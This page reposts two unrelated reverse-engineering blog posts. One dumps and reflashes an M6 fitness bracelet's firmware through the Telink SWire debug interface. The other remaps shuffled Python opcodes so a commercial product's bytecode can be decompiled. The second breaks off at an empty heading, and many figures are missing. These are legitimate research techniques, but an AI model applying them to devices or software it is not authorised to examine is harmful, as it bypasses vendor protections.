Reverse Engineering the M6 Smart Fitness Bracelet

Reverse Engineering the M6 Smart Fitness Bracelet

Original text by rbaron_

Following a year and a half of sitting inside the house, I set out to improve my wellbeing by getting a new fitness tracker. It worked out better than I expected — hacking on it kept me busy for a couple of months — at the small price of making me sitting inside the house even harder.

Before starting, I stated my goals as follows. I wanted to:

  1. Understand its hardware
  2. Figure out how to talk to it
  3. Dump its stock firmware
  4. Get it to run custom code, ideally making use of its:
    • GPIO pins (both for input and output)
    • Color display
    • Bluetooth low energy (BLE) capabilities

I documented the process of going through these goals in the following sections. It’s been an incredibly fun journey. I hope you enjoy it as much as I did.

The M6 Fitness Tracker Bracelet(s)

The particular bracelet we are talking about is the M6 from AliExpress (screenshot). I believe the name is an attempt to piggyback on the popularity of the $50, entry level Xiaomi Mi Smart Band 6 fitness tracker. At a $6 price point, our device is an even entrier level bracelet, and to put it politely, it draws a lot of inspiration from the Xiaomi one.Front of the boxFront of the M6 box

Hardware Overview

Disassembling the plastic case is so easy that it’s difficult to trust the IP67 water resistance rating claimed on the box.

Inside, we see some interesting stuff:

  • A Telink TLSR8232 system-on-a-chip (SoC)
  • A 0.96” (160×80 px) color display
  • A tiny ~100 mAh LiPo battery and USB charging circuit
  • A vibration motor
  • A (most likely) fake heart rate sensor

The Brains

Front of the PCBTop view of the printed circuit board

The SoC in the M6 is a Telink TLSR8232 (datasheet). Some specs:

  • 32-bit CPU
    • Closed architecture (usually referred to as tc32, similar to ARM9) — not a lot of resources about it
    • 24 MHz clock speed
  • 16kB of SRAM
  • 512kB of internal flash
  • 32kHz onboard oscillator for low power mode
  • SWS (Single Wire Slave) interface for debugging and programming
  • Integrated Bluetooth Low Energy (BLE) transceiver
  • Low power operation (alleged ~2 uA in deep sleep)

As luck would have it, just a few months ago I had seen a Telink chip in my little, hackable Xiaomi thermometer. At the point, I re-flashed it with @atc1441’s alternative firmware. Even though it’s a different SoC model, this gave me a little hope and a valuable starting point.

Exposed Pads

Front of the PCB (1/2)Bottom view of the printed circuit board (1/2)Back of the PCB (1/2)Bottom view of the printed circuit board (2/2)

Armed with nothing but a multimeter, a datasheet and good intentions, I tried to find where these pads are connected to. This is what I came up with:

PadSoC Pin #SoC Pin Label
SWS01SWS/ANA_C<7>
DAT06ANA_A<4>
TEST27ANA_C<1>
TX18ANA_B<4>
RX19ANA_B<5>

The Single Wire (aka. SWire or SWS) Interface

Now that we identified the brains of the bracelet, we turn to the goal of actually talking to it. If you programmed an ESP32 before, you probably relied on its bootloader and talked to it via UART. If you programmed or debugged an ARM microcontroller before, you probably used the SWD (serial wire debug) protocol.

In Telink-land, the analogous interface is called Single Wire or SWire. This is how apps are loaded into its flash memory, how it’s memory is read and written and how it’s debugged at runtime.

The real fun begins, though, when we try to learn more about this interface. The datasheet is almost comically quiet about it, as if pretending it doesn’t exist.

In the real world, where real programmers do real work, these chips are flashed and debugged with Telink’s official Burning and Debugging Tool. In the past, it seems hobbyists could get these devices very easily, but I couldn’t find them on the usual places in the beginning of the project. Now, as I write this post, it seems they recently became available on Mouser.

While the lack of specs and programmer set the stage up for a very unsatisfying dead end, this is, in fact, where things start to get interesting. The deep dive into the SWire specs and alternative tooling has been the most rewarding part of the project. Read on.

The Missing Specs

In what could be the nerdiest Indiana Jones spin-off yet, “the search for the missing SWire specs” brought me to the work of pvvx. Victor, in addition to maintaining a forked and low-power-optimized version of the alternative Xiaomi thermometer firmware from earlier, is a bona fide SWire ninja.

I struck gold when I came across one of his repositories, the TlsrTools. In there, there’s an excerpt of a PDF that contains a brief, two-page description of the SWire protocol. This seems to be a part of an old version of a Telink datasheet that has since been chopped off. That’s great news. We’re back in the game.

The Alternative Programmer

Victor also bootstrapped a whole new open source programmer for some Telink chips based on the beloved and ubiquitous STM32 Blue Pill board. This means that potentially both our roadblocks are removed — we have a (terse) SWire interface spec and a programmer.

At this point I start to really enjoy the process of demystifying SWire. It reminded me of the heartwarming story of when Paul McCartney and John Lennon got on a bus across Liverpool to meet a fellow they heard knew about the B7 chord. Now here I am, getting on the proverbial bus to meet this single fellow I heard knew about the SWire interface.

The bus takes me to interesting places. I can’t recognize the street signs, but the view looks amazing. I imported the STM32 code into my editor and translated some of its Russian comments.

This cross-language detective work gave me a relatively good understanding of the SWire protocol and of how to use Victor’s alternative programmer. There’s still a remaining pressing question, though. Victor’s programmer is made for TSLR826x chips, and we’ve got a TLSR8232 chip on our hands.

From Pascal to Python

There are usually three moving parts when programming/debugging a chip:

  1. The target board we want to program
  2. The programmer hardware
  3. The computer software that talks to the programmer

In Victor’s alternative programmer, the computer software is a Pascal, Windows-only application. I think it is a prime example of getting real stuff done with the language at hand.

The role of the computer software is to send commands to the programmer hardware and get it to read/write data from/to the target board. As I don’t have a Windows box at home, I implemented a barebones Python script, the tlsr82-debugger-client.py that works as the computer software component.

We can now use this Python script and the STM32 to hopefully speak SWire with our M6 bracelet. The setup is as follows:STM32 programmer + M6 setupThe STM32-based alternative programming setup

SWire Protocol Overview

Let’s take a dip into the mysterious SWire spec.

As the name suggests, a single wire is used for transmitting data back and forth between two devices. In our case, the STM32 programmer (the master) and the target board (the slave). There is no separate clock line as in SPI or I2C. The single wire topology allows for both devices to speak, but they cannot speak at the same time. In other words, we can call SWire an asynchronoushalf-duplex interface.

These two key aspects of SWire imply that:

  • Asynchronous: since there’s no shared clock, both devices must somehow employ compatible reading & writing speeds
  • Half duplex: each device must know when it should listen to messages and when it’s allowed to transmit messages. There must be a precisely choreographed dance between the two parties

To achieve coordination, the SWire protocol attributes responsibilities to the master and slave devices. The master is responsible for initiating the communication and managing the bus logic level between data transfers. The slave is responsible for sending data when it’s expected to. I put together some real-world examples below to make this clearer.

Sending a Single Bit

The first thing to notice is how bits are encoded in the wire. Each bit is transmitted in five units of time:

  • To send a 0, keep the voltage low for one unit and high for 4 units;
  • To send a 1, keep the voltage low for 4 units of time and high for 1 unit;

To make matters concrete, here is a real SWire transmission I captured with a logic analyzer:SWire 0s and 1sExample of a 0 and a 1 in SWire

In the above screenshot, there are 8 bits being transmitted between the flags marked as 25 and 26. Can you decode these 8 bits? If you’re feeling brave, let me know your answer.

Sending a Single Byte

We now know how individual bits look in the wire. To transmit a full byte, the SWire protocol specifies that 9 bits are needed:

  • Bit 1: The cmd bit. 0 specifies that the message contains data and 1 specifies that the message is a command
  • Bits 2-8: The message content (8 bits)
  • One time unit of low level to signal the end of the message

Again, let’s take a look at a real-world example transmission of a 0xb0 byte:SWire byte transmissionExample of sending one byte in SWire

After the last unit of low is sent, the bus is released and goes back to it’s natural high voltage. In other words, the SWire data bus is pulled high.

Write Requests

We saw how individual bits and bytes are encoded in the wire. Next, let’s take a look at how the SWire protocol specifies a byte to be written at a specific address. In this scenario, the master wants to write a byte b to the address addr in the slave’s memory.

To do so, the master must send a sequence of bytes, each one encoded as described in the section above:

  1. The START byte. This one always has the value 0x5a
  2. The most significant 8 bits of the target addr
  3. The least significant 8 bits of the target addr
  4. The RW_ID byte. The most significant bit should be set 0 for writing operations
  5. The byte value b
  6. The END byte. It always has the value 0xff

Let’s look at the following example:

SWire write request

Example of writing data in SWire

In this example, we can see the byte 0x05 being written into the slave’s memory address 0x0602.

Variations of the SWire Protocol

It’s worth noting that there exists at least one variation of the SWire protocol. In the other variant, the master sends 3 bytes of addr after the START byte, instead of only two bytes in our SWire protocol. The 3-byte variant is employed, for example, in Telink’s TLSR8251 SoCs, used in the Xiaomi thermometer we mentioned above. In the Python-based flasher in ATC_MiThermometer repository, we can see where the 3 bytes of addr are specified in the read/write requests from the master to the slave device.

Writing multiple bytes

That’s a lot of overhead for writing a single byte. Luckily, the protocol let’s us write multiple data bytes at once. To do so, the master simply sends a sequence of bytes instead of a single byte like in the example above.

Read Requests

Read requests are very similar to write requests. There are only two important differences:

  1. The most significant bit of the RW_ID byte is set to 1
  2. Instead of sending data after the RW_ID byte, the master reads data from the SWire data line

Again, take the following example. To make things more interesting, in this example the master reads two bytes from the slave:

Example of reading data in SWire

After sending the RW_ID byte, the master sends one unit of low level. The slave responds with 8 bits of data and one unit of low level. The master can request more data by writing a single unit of low level, otherwise the master sends the END byte (0xff) and the transmission is over.

Let’s zoom into the transmission of multiple bytes during the read request, just after the RW_ID byte above:

Zoom into the multi-byte read request

In this example, the master reads the value 0x5316 from the slave’s address 0x007e.

The address 0x007e we just read is, in fact, a special register in the TLSR82xx chips. It holds the “Chip ID”. For our TLSR8232, the Chip ID is 0x5316.

You can find this whole annotated logic analyzer capture in get_soc_id.sal. It includes reads and writes requests.

Speed Mismatch Hazard

The above read example, we saw that both the master and slave read and write to the same bus. They must understand each other’s messages. A crucial setting is the speed at which both devices transmit data.

Let’s turn to the following pathological example. It is the same read request for address 0x007e as above:

Example of speed mismatch between the master and slave

Take a look at what happens after the master sends it’s RW_ID byte. The slave starts responding, but with at a visibly lower speed. We can see that the bits are encoded in much wider windows than the previous ones sent from the master. Also note that, even though the whole transmission failed, the beginning of the slave’s response seems promising. It’s starts with 0x16, which is the expected first byte of the “Chip ID”.

This speed mismatch is a problem. It breaks the precise dance that the master has to coordinate. But not all is lost — from this observation we can draw two important conclusions — a bad one and a good one

  1. Bad one: To read data, the slave’s speed has to be compatible with the master’s speed, otherwise the master fails to coordinate the whole operation. I believe we could find a solution that adjusts this speed and gets the master to adapt its pace to the slave’s speed, but this is not currently done
  2. Good one: Writing data seems to be a less coordination-sensitive operation. As we noted above, the slave seems to have been able to correctly understand the bytes sent from the master (which spell “read request for address 0x007e”), even though the slave itself is misconfigured with a slower speed

The last piece of the speed puzzle is that we can configure the slave’s speed by writing to one of its special registers. From the “missing SWire spec”, we see a little note about the register at the address 0xb2:

Slave’s SWire speed control register

In short, we can tune the slave’s SWire speed by writing to it’s 0xb2 memory address.

On the other end, we also need to set up the master’s SWire speed.

The strategy that has worked is to fix the master’s SWire speed at a reasonable value and try a few possible speeds for the slave. This is precisely what our Python script does (edited for brevity):

# Writes the value `speed` into the slave's 0x00b2 register.
def set_speed(speed):
    return write_and_read_data(make_write_request(0x00b2, [speed]))

def find_suitable_sws_speed():
    for speed in range(2, 0x7f):
        set_speed(speed)
        try:
            get_soc_id()
        except Exception:
            continue
        else:
            print(f'Found and set suitable SWS speed: {speed}')
            return speed
    raise RuntimeError("Unable to find a suitable SPI speed")

def init_soc(sws_speed=None):
    ...
    # Set up the master speed.
    set_pgm_speed(0x03)

    # If the user specifed a slave speed, use that.
    if sws_speed is not None:
        set_speed(sws_speed)
    # Otherwise try many different ones until one works.
    else:
        find_suitable_sws_speed()

Invalid CPU State Hazard

Another tricky trap is the fact that sometimes the slave’s CPU does not seem to respond to SWire requests. I haven’t found the precise reason, but my guess is that SWire doesn’t work when the slave is in some power saving mode or has interrupts disabled.

In practice, it means that it can be difficult to start a SWire exchange depending of the program that is running on the target device. To overcome this, pvvx’s strategy is to:

  • Reset the device (by pulling it’s RST pin low)
  • Start bombarding the target device with “CPU stop” SWire commands while the RST pin is pulled high

The objective here is to reach the CPU in a good state as it resets, before the application messes up with it too much.

Trick for stopping the CPU as early as possible

For the extra curious reader, the “CPU stop SWire command” is a simple write request of 0x05 to address 0x0602. This address corresponds to a special register that controls the CPU state.

Getting to the RST Pin

The RST trick above works really well. The only downside is that, if you look at the M6 board, the RST pin is not broken out in any pad.

Getting to the RST pin. Toothpick for scale

In the datasheet, we can see that the TLSR8232 RST is on pin 26. On the M6 board, this pin connects directly to a tiny capacitor, as shown in the photo above. This is a tricky soldering job, but it’s doable with a pre-tinned wire and a little bit of flux.

Alternative Tricks — No RST Soldering Required (Possibly)

While having the RST pin available makes life easier and working with SWire more predictable, it might not be strictly necessary. Two ideas to get around it:

  1. Just try it without the RST pin. You might find that it just works. In fact, if you look at how the Xiaomi thermometer alternative firmware is flashed, you will find out that the RST is not needed there
  2. As a last resort, you can try to manually power cycle the target board while the “CPU stop” bombardment is going on. You might try to tweak the code to increase this time window

Reading the SoC ID

With the content we covered so far, we are ready to take a look at a real-world scenario. Using the tlsr82-debugger-client.py Python script to read the target device’s memory:

% python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 get_soc_id
Trying speed 2
Trying speed 3
Trying speed 4
Trying speed 5
Trying speed 6
Trying speed 7
Found and set suitable SWS speed: 7
SOC ID: 0x5316

Behind the scenes, this invocation takes some of the steps we covered previously:

  1. Reset the target board by pulling RST low
  2. Bombard the target board by writing many “CPU stop” values to its CPU control register while RST is pulled high
  3. Set up the master’s SWire speed
  4. Iterate over possible SWire speeds for the target board until a suitable one is found
  5. Issue a 2-byte read request to address 0x007e

Reading and Writing to the Internal Flash Memory

One of our goals is to dump the target board’s firmware. It is stored in the board’s internal flash memory. While the details fo the SWire protocol are not public, Telink does offer a SDK for the TLSR8232 SoC. In there, there is an interesting file in ble_sdk_hawk/drivers/5316/flash.c that contains the code for the chip to read and write to its own internal flash — comments are my own:

_attribute_ram_code_ void flash_write_page(unsigned long addr, unsigned long len, unsigned char *buf){
  unsigned char r = irq_disable();

  // Writes value 6 to register 0x0d (spi control register).
  flash_send_cmd(FLASH_WRITE_ENABLE_CMD);
  // Writes value 2 to register 0x0d (spi control register).
  flash_send_cmd(FLASH_WRITE_CMD);
  // Writes 3 bytes of the target address to register 0x0c (spi data register).
  flash_send_addr(addr);

  unsigned int i;
  for(i = 0; i < len; ++i){
    // Write data byte to register 0x0c (spi data register).
    mspi_write(buf[i]);
    mspi_wait();
  }
  // Chip select high.
  mspi_high();
  flash_wait_done();

  irq_restore(r);
}

_attribute_ram_code_ void flash_read_page(unsigned long addr, unsigned long len, unsigned char *buf){
  unsigned char r = irq_disable();

  // Writes value 3 to register 0x0d (spi control register).
  flash_send_cmd(FLASH_READ_CMD);
  // Writes 3 bytes of the target address to register 0x0c (spi data register).
  flash_send_addr(addr);

  // Dummy write to register 0x0c (spi data register).
  mspi_write(0x00);
  mspi_wait();
  // Writes value 0x0a to register 0x0d (spi control register).
  mspi_ctrl_write(0x0a);
  mspi_wait();
  /* get data */
  for(int i = 0; i < len; ++i){
    // Reads byte from register 0x0c (spi data register).
    *buf++ = mspi_get();
    mspi_wait();
  }
  // Chip select high.
  mspi_high();

  irq_restore(r);
}

We can see that interacting with the internal flash boils down to writing to the target board’s SPI control register (at address 0x0d) and reading/writing to the SPI data register (0x0c), as well as manipulating the SPI chip select logic level.

Since we know how to interact with the target board’s memory addresses via SWire, we can implement the exact same operations in our Python script, targetting reads and writes to the SPI control and data registers (0x0d and 0x0c, respectively). This is exactly what I did. For instance, check out the write_flash function:

def write_flash(addr, data):
    send_flash_write_enable()

    # Chip select low.
    write_and_read_data(make_write_request(0x0d, [0x00]))

    # Write command.
    write_and_read_data(make_write_request(0x0c, [0x02]))

    # Flash address.
    write_and_read_data(make_write_request(0x0c, [(addr >> 16) & 0xff]))
    write_and_read_data(make_write_request(0x0c, [(addr >> 8) & 0xff]))
    write_and_read_data(make_write_request(0x0c, [addr & 0xff]))

    # Write data
    write_and_read_data(make_write_request(0x0c, data))

    # CNS high.
    write_and_read_data(make_write_request(0x0d, [0x01]))

The read_flash function works similarly.

Dumping the Firmware

With the ability to read the target board’s internal flash over SWire, we can now dump the M6’s firmware:

$ python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 dump_flash flash.bin
Found and set suitable SWS speed: 7
Dumping flash to flash.bin...
CPU stop.
CSN high.
0x000000 00.00%
0x000100 00.05%
0x000200 00.10
...
0x07cd00 99.85%
0x07ce00 99.90%
0x07cf00 99.95%
Writing 512000 bytes to flash.bin

You can find the raw dump in the project’s repository, under dumped/flash.bin.

SDK, Compiler & Docker Image

With the first major goal of dumping the firmware behind us, we now turn to the challenge of running our own code on it. The first step is to get the SDK and compiler for the TLSR8232.

The SDK is available on Telink’s website. The one I used is listed in the “Bluetooth LE Generic” section. Unpacking the SDK reveals it’s integrated with Telink’s own IDE, which is based on the Eclipse IDE and seems to be only available for windows. This is fine, but I would love to make things easier creating a single Docker file with all the environment needed for compiling TLSR8232 programs.

Googling around brought me to the Ai-Thinker-Open/Telink_825X_SDK repository. It contains a SDK for Telink chips and it refers to a Linux tc32 toolchain, which is exactly what we need for running it under Docker. I used the tc32 toolchain and the TLSR8232 BLE SDK and set up a Dockerfile that makes compiling our custom code simpler.

With this, we can simply spin up a Docker container and type make to compile our code. We can build the blinky binary by doing:

# In the example-programs directory.
# Build the Docker image from the Dockerfile.
$ docker build -t tlsr8232 .

# Run the Docker containers and mount the current directory into /app.
$ docker run -it --rm -v "${PWD}":/app tlsr8232

# Inside the docker container, compile the blinky example.
$ cd blinky/
$ make
...

# The compiled binary file is in _build/blinky.bin.
$ ls _build/blinky.bin
_build/blinky.bin

Blinky

The time has come. We now have all the tools and knowledge to compile and burn our own little firmware on the M6 bracelet. I hooked up a red LED to the TX pad and set out to make it blink.

The sample code for the blinky can be found in the GitHub repo under example-programs/blinky. Here is the entirety of its main() function:

int main() {
  cpu_wakeup_init();
  clock_init(SYS_CLK_16M_Crystal);
  gpio_init();

  // TX pad.
  gpio_set_func(GPIO_PB4, AS_GPIO);
  gpio_set_output_en(GPIO_PB4, 1);
  gpio_set_input_en(GPIO_PB4, 0);
  gpio_write(GPIO_PB4, 1);

  while (1) {
    gpio_toggle(GPIO_PB4);
    sleep_ms(500);
  }
  return 0;
}

As we did all the hard work of setting up the SDK & toolchain within our Docker image, compiling it is a breeze, as we saw in the previous section. We just have to use our Docker file, mount the example-programs/ repository directory into /app and type make on the example we want to build:

root@c54c8204641d:/app/blinky# make
mkdir -p _build/drivers
...
/opt/tc32/bin/tc32-elf-gcc -c -Wall -std=gnu99 -DMCU_STARTUP_5316 -I /opt/8232_BLE_SDK/ble_sdk_hawk/ -ffunction-sections -fdata-sections -o _build/main.o main.c
/opt/tc32/bin/tc32-elf-ld --gc-sections -T /opt/8232_BLE_SDK/ble_sdk_hawk/boot.link -o _build/blinky _build/main.o _build/drivers/gpio.o _build/drivers/analog.o _build/drivers/clock.o _build/drivers/bsp.o _build/drivers/adc.o _build/asm/cstartup_5316.o /opt/8232_BLE_SDK/ble_sdk_hawk/proj_lib/liblt_5316.a
/opt/tc32/bin/tc32-elf-objcopy -O binary _build/blinky _build/blinky.bin

Burning the compiled firmware in the M6 board is done with our trusty Python script:

$ python tlsr82-debugger-client.py --serial-port /dev/cu.usbmodem6D8E448E55511 write_flash ../example-programs/blinky/_build/blinky.bin
Found and set suitable SWS speed: 7
Erasing flash...
Flash status: 03
Flash status: 00
Writing flash from ../example-programs/blinky/_build/blinky.bin...
0x0000 00.00%
0x0100 03.35%
0x0200 06.71%
...
0x1c00 93.92%
0x1d00 97.27%
Flash status: 00

Immediately after the command finishes, the M6 board should do its thing:

A love letter to the «yOu ShOuLd HaVe uSeD a 555» gang

The Capacitive Button

The touch pad in the M6 is not connected directly to the TLSR SoC, but instead passes through a driver IC on the board. I suspect the IC is responsible for managing the touch-sensing circuitry and piping a clean digital signal to the SoC, but I couldn’t easily identify the mysterious IC.

To figure out the corresponding SoC button pin, I used a binary search approach. I first identified all GPIO pins that hadn’t been used yet and set them all up as inputs. I then iterated over them and checked whether or not any of them changed state as I touched the button. If that happened, I toggled the LED. I then partitioned the GPIO pins under test in two groups and repeated the process for that group. It’s not very elegant but I got to the actual pin in no time.

It turns our the button state can be read from the GPIO_PC2 pin. Here’s the result of running example-programs/button firmware:

Touching the capacitive button turns the LED off

Display

The next goal is to draw something on the display. The first task to identify the hardware. After a lot of googling and guessing, I found the exact same display on AliExpress.

It is a 13-pin, 160×80 px, color SPI TFT display. It’s a little weird that the data lines are called SDA and SCL (which are often seen in I²C devices). I believe they are, in fact, the MOSI and SCLK in disguise.Display pinsOverlaid pin labels on the display connector

It uses the ST7735 driver (PDF) to push pixels to the screen. This is good news, as this driver is relatively popular among color displays. It’s featured in many maker-friendly products and supported by Adafruit’s ST7735 library. While Adafruit’s library is built on top of Arduino abstractions and we’re very far from that, it proved to be a great reference.

Next, again, the task is to figure out to which SoC pins the display are connected. Long story short:

Display pinSoC Pin #SoC Pin LabelFunction
SDA29SWS/ANA_C<3>SPI data
SCL31ANA_C<5>SPI clock
RS32ANA_C<6>Data/command selector (D/C# in the ST7732 datasheet)
CS03ANA_A<1>SPI chip select, active low
RST02ANA_A<0>Reset pin, active low
LEDK04ANA_A<2>TFT backlight diode cathode; Driven through a NPN transistor

To draw a single pixel on the display, we need to take the following actions:

  1. Turn on the display’s backlight by driving it’s LED cathode (LEDK pin)
  2. Pull RST high
  3. Set up SPI with pins SDA & SCL on the target board
  4. Send a bunch of commands to the ST7735 driver. These include:
    1. Get out of sleep mode
    2. Set up the color format (here I’m using RGB565, with 16 bits per pixel)
    3. Set up the display’s physical dimentions
    4. Turn the display on
  5. Send a command to define the drawing region
  6. Send 16 bits of color for a single pixel

Getting all the details right was not an easy task. Most of the time it feels like working with a black box — there’s no feedback and the error could be anywhere, from the display identification to the pin mapping to the program logic to firmware burning errors.Using all the tools in the toolboxWhich tools did I use? Yes.

In the end, through blood, sweat and tears, it finally worked. The example-programs/display draws some color squares in the middle of the screen:

Display squares
Display pins

Drawing Text

Given we know how to draw individual pixels on the display, drawing text boils down to figuring out which pixels should be drawn for each character.

bitmap font fits the bill perfectly. In those, each character is just an array of bits, in which a 0 represents background and 1 represents the pixels we need to draw.

Let’s borrow the Picopixel bitmap font from the Adafruit GFX library.

As an example, if we dig a little bit, we find that the letter A is 3 pixels wide x 5 pixels high and is encoded in the two bytes 0x57 0xda. We start by unrolling those bytes into their binary representation:

0x57 0xda => 0101011111011010

We know this particular character is 3 pixels wide, so we lay that bit sequence into rows, 3 bits at a time:

010
101
111
101
101

And just like magic, if we paint the 1 bits, we see the letter 'A' come up:

 #
# #
###
# #
# #

I implemented this idea in example-programs/text. It’s nice to notice that this algorithm generalizes well for scaling up text. We can target groups of 2×2, 3×3 or 4×4 pixels as if they were one single superpixel.

A dramatic example of text drawing

Bluetooth Low Energy — Peripheral Role

To get started with BLE, I set up the TLSR8232 in peripheral mode and defined a BLE characteristic that toggles an LED when it’s written to. In example-programs/ble-services, I hooked an LED to the TX pad:

Bluetooth Low Energy Blinky

In the previous video, I’m using the nRF connect iOS app to connect to the M6 board and interact with the BLE services I defined in the firmware.

Bluetooth Low Energy — Central Role

For the grand finale, I set up to use the M6 as a BLE tracker for another project on mine — the b-parasite soil moisture/air temperature and humidity sensor.

The b-parasite broadcasts its sensor readings via BLE advertisement packets. I thought it would make an interesting demo if I could capture those broadcasts with the M6 and print the sensor values on its display.

As we know the MAC address of b-parasites, we can filter the relevant advertisements with it. Once we identify a b-parasite advertisement, we look into its raw bytes to decode the sensor values:

// BLE advertisement callback. Called whenever a new advertisement
// packet comes in.
int hci_event_handle(u32 h, u8 *param, int n) {
  ...
  event_adv_report_t *p = (event_adv_report_t *)param;
  ...
  // Is this a b-parasite advertisement?
  if (p->mac[5] == 0xf0 && p->mac[4] == 0xca && p->mac[3] == 0xf0 &&
      p->mac[2] == 0xca && p->mac[1] == 0x00 && p->mac[0] == 0x08) {
    ...
    // Decode sensor values from the advertisement payload.
    b_parasite_adv_t bp_data;
    bp_data.counter = p->data[8];
    bp_data.battery_millivoltage = p->data[9] << 8 | p->data[10];
    bp_data.temp_millicelcius = p->data[11] << 8 | p->data[12];
    bp_data.air_humidity = p->data[13] << 8 | p->data[14];
    bp_data.soil_moisture = p->data[15] << 8 | p->data[16];

    // Draw values on the display.
    draw_parasite_data(&bp_data);
    ...
}

The full code for the demo is in example-programs/ble-b-parasite-tracker. Here’s the result:

Bluetooth Low Energy & b-parasite

Final Words

If you made it this far, thanks for reading. I hope you enjoyed it. As much as it is a lot of fun, writing posts like this takes a lot of time and effort. If you want to show your support, consider following me on Twitter.

Remapping Python Opcodes

Original text by Chris Lyne

In my previous blog post, I talked about compiled Python (.pyc) files that I couldn’t manage to decompile. Because of this, my ability to audit the source code of Druva inSync was limited, and I felt compelled to dig deeper. What I found was that all of the operation codes (opcodes) had been shuffled around. This is a known technique for obfuscating Python bytecode. I’ll take you step by step through how I fixed these opcodes to successfully recover the source code. This technique is not limited to Druva and can generally be used to remap any Python opcodes.

Let’s first look at the problem.

It won’t decompile

In the installation directory of Druva inSync, you’ll notice that there is a Python27.dll and library.zip. When inSync.exe boots up, these files are immediately read. I’ve filtered the procmon output for brevity. This behavior is indicative of an application built with py2exe.

When you unzip library.zip, it contains a bunch of compiled Python modules — custom and standard. Shown below is a subset of the whole.

.pyc’s can often be decompiled pretty quickly by tools like uncompyle6. For example, struct.pyc is part of the Python standard library, and it decompiles just fine — only a few imports.

Decompiling normal struct.pyc

Now, doing the same against the struct.pyc packaged in library.zip, here’s the output:

Decompiling Druva struct.pyc

Unknown magic number 62216.

But why?

If you were to look at a .pyc file in a hex editor, the magic number is in the first 2 bytes of the file, and it will be different depending on the Python version that compiled it. For example, here is 62216:

Druva magic number

62216 is not a documented magic number. But 62211 is close to it, and that corresponds to version 2.7.

What’s strange is that the python27.dll distributed in the Druva inSync installation is version 2.7, hence the DLL name. Yet, its magic number is different.

Druva python27.dll

This looks nearly identical to the normal 2.7.15150.1013 DLL.

Normal python27.dll

The size and modified date are a little different, but the version is the same. If the version is the same, why is the magic number not 62211?

Digging into the OpCodes

My next idea was to load up a Python interpreter using the Druva inSync libraries. I did this by first dropping the Druva python27.dll into c:\Python27. I also had to ensure that the search path pointed to the Python modules distributed with Druva inSync.

Python interpreter with Druva libraries loaded

At this point, I could load the ‘opcode’ module to view the map of opcodes.

Druva opcode map

Below is the normal Python 2.7 opcode map:

Normal opcode map

Notice that the opcodes are completely different. For example, ‘CALL_FUNCTION’ maps to 131 normally, and its opcode is 111 in the Druva distribution. As far as I can tell, this is true for every operation.

Remapping the OpCodes

In order to decompile these obfuscated .pyc files, the opcodes need to be remapped back to the original Python 2.7 mapping. Easy enough, right? It’s slightly more complicated than it appears on the surface. In order to accomplish this, one needs to understand the .pyc file format. Let’s take a look at that.

Structure of a .pyc

Let’s turn to the code to make sense of the .pyc file structure. We are looking at the py_compile module’s compile function. This function will convert a .py file into a .pyc.

Starting at line 106, timestamp is first populated with the .py file’s last modification time (st_mtime). And on line 111, the source code is read into codestring.

Next, the source code is compiled into a code object using the builtin compile function. Since the .py likely contains a sequence of statements, the ‘exec’ mode is specified.

Assuming no errors occur, the new filename is created (cfile). If basic optimizations were turned on via the -o flag (__debug__ tells us this), the extension will be ‘.pyo’, otherwise it will be ‘.pyc’.

Finally, the file is written to. The first 4 bytes will be the magic string value, returned by imp.get_magic(). Next, the timestamp is written. And finally, the code object is serialized using the marshal module.

Let’s look at an example by compiling our own module.

Example: Hello world

Here’s our friend, hello.py. It’s just a print statement.

If we compile it, it spits out a hello.pyc file.

Here is a hexdump of hello.pyc

If we were to load this up, we can actually parse out the individual components. First we read the file, and store the contents in bytes :

The magic string is 03f30d0a; however, the magic number is 03f3. It’s always followed by 0d0a.

If we unpack this unsigned short, the magic number is 62211. We now know the .pyc was compiled by version 2.7. Let’s look at the timestamp now. It is 4 bytes long, starting at offset 4.

.

This makes sense because I created the .py file at 2:26 PM on April 30th.

And finally, the serialized code object remains to be read. It can be deserialized with the marshal module, and the object is executable. Hello world!

Let’s frame up the problem to be solved. The main goal is to decompile a .pyc file, and fix its opcodes. During decompilation, an intermediate step is to disassemble the .pyc code objects into opcodes.

Disassembling Code Objects

Let’s use the dis module to disassemble the code object in hello.pyc.

All of these instructions are required to print ‘Hello world!’. In the first instruction, we can see “0 LOAD_CONST 0 (‘Hello world!’)”. “0 LOAD_CONST” means a LOAD_CONST operation starts at offset 0 in the bytecode. And “0 (‘Hello world!’)” means that the constant at index 0 is loaded (the string is just shown in the disassembly output for clarity). Technically speaking, LOAD_CONST pushes a constant onto the stack.

Looking at the code object, the bytecode (co_code) and constants (co_consts) are accessible (and variables, etc).

Here is the raw bytecode:

Here the opcode at offset 0 is ‘d’, which is actually decimal 100 in ascii. This can be looked up in the opname sequence.

The next two bytes, “\x00\x00” represent the index of the ‘Hello world!’ constant (operand).

We’ve now established that code objects can be disassembled with the dis module. The disassembly displays instructions consisting of operation names and operands. We can also inspect the raw bytecode (co_code) and constants (co_consts) stored in code objects (other stuff as well). It gets tricky when code objects contain nested code objects.

Since we have the opcode mappings for both Druva and the normal Python 2.7, we can develop a basic strategy for opcode conversion. My strategy was to disassemble the code object in a .pyc file, convert each operation, and stuff all of this into a new code object. No need to remap operands. However, it’s just a bit more complicated than that. Let’s look at nested code objects.

Nested Code Objects

Most of the modules you encounter will be more complex than the hello world. They will contain functions and classes as well.

Here is a more advanced hello world example:

Breaking it down, we have a class named “HelloClass”. The class contains functions named “__init__” and “sayHello.” Let’s disassemble the code object after reading the .pyc.

Notice the LOAD_CONST instruction at offset 9. A HelloClass code object is loaded. This HelloClass code object is stored at index 1 in co_consts.

Let’s disassemble that too.

More code objects? Yep. The __init__ and sayHello functions are code objects as well. A code object can have many layers of nested code objects. This requires the opcode remapping algorithm to be recursive!

The Algorithm

For reference, here are the opcode mappings again:

Druva opcode mapping
Normal Python 2.7 opcode mapping

Here’s my general algorithm.

Starting with the outer code object in the .pyc file (code_obj_in), convert all of the opcodes using the mappings above and store into new_co_code. For example, if a CALL_FUNCTION is encountered, the opcode will be converted from 111 to 131. We will then inspect the co_consts sequence and recursively remap any code objects found in there. new_co_consts will be added into the output code object.

When the new .pyc file is created (not shown), it will have a magic number of 62211, and all code objects will be populated with remapped opcodes. Let’s see the script in action.

Running the process converts a total of 1773 .pyc files. Notice I copied the Druva python27.dll into C:\Python27. Bytecode was disassembled using the Druva opcode mappings, and then converted.

Converting opcodes

And after conversion, we can successfully decompile the .pyc’s in the inSyncClient folder! Prior to opcode conversion, this was not possible.

Decompilation is successful

Closing Thoughts

